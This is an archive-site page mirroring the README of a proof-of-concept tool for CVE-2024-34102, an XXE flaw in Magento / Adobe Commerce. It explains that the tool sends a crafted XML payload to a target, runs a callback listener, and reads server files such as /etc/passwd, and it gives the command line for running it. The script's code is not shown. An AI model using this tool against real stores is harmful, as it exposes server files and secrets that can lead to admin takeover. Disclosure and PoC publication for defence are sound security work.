Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2024-34102 PoC — XXE can expose crypt key and other secrets granting full admin access

Source
https://github.com/bigb0x/CVE-2024-34102
Associated Vulnerability
Title:XXE can expose crypt key and other secrets granting full admin access (CVE-2024-34102)
Description:Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
Description
POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.
Readme
# CVE-2024-34102
POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce. 

![Banner](screens/screen.jpg)


## Overview

This POC will attempt to read files from target hosts that are vulnerable to the recent Magento / Adobe Commerce CVE-2024-34102. This POC is based on this [security advisory](https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md) and this research by [Assetnote](https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102).

## How to Use

In order to run this poc, you will have to have a machine with published and accessible IP. 

### What This POC Does

1. Creates a local file `poc.xml` containing the main payloads.
2. Sends the payload to the target via a POST request.
3. Sets up a listener on your machine for incoming GET requests from the target.
4. Attempts to read files from the target (default: `/etc/passwd`).

### Minimum Requirements

- Python 3.6 or higher
- `requests` library
  
To use this POC against a single target:
```sh
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)
```

## Contact

For any suggestions or thoughts, please get in touch with [me](https://x.com/MohamedNab1l).


## Disclaimer

This provided tool is for educational purposes only. I do not encourage, condone, or support unauthorized access to any system or network. Use this tool responsibly and only on systems you have explicit permission to test. Any actions and consequences resulting from misuse of this tool are your own responsibility.

## References
- https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
- https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
File Snapshot

 [4.0K]  /data/pocs/ad031453052324458249232e3558b20f444b48e5
├── [10.0K]  cve-2024-34102.py
├── [1.8K]  README.md
└── [4.0K]  screens
    └── [239K]  screen.jpg

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →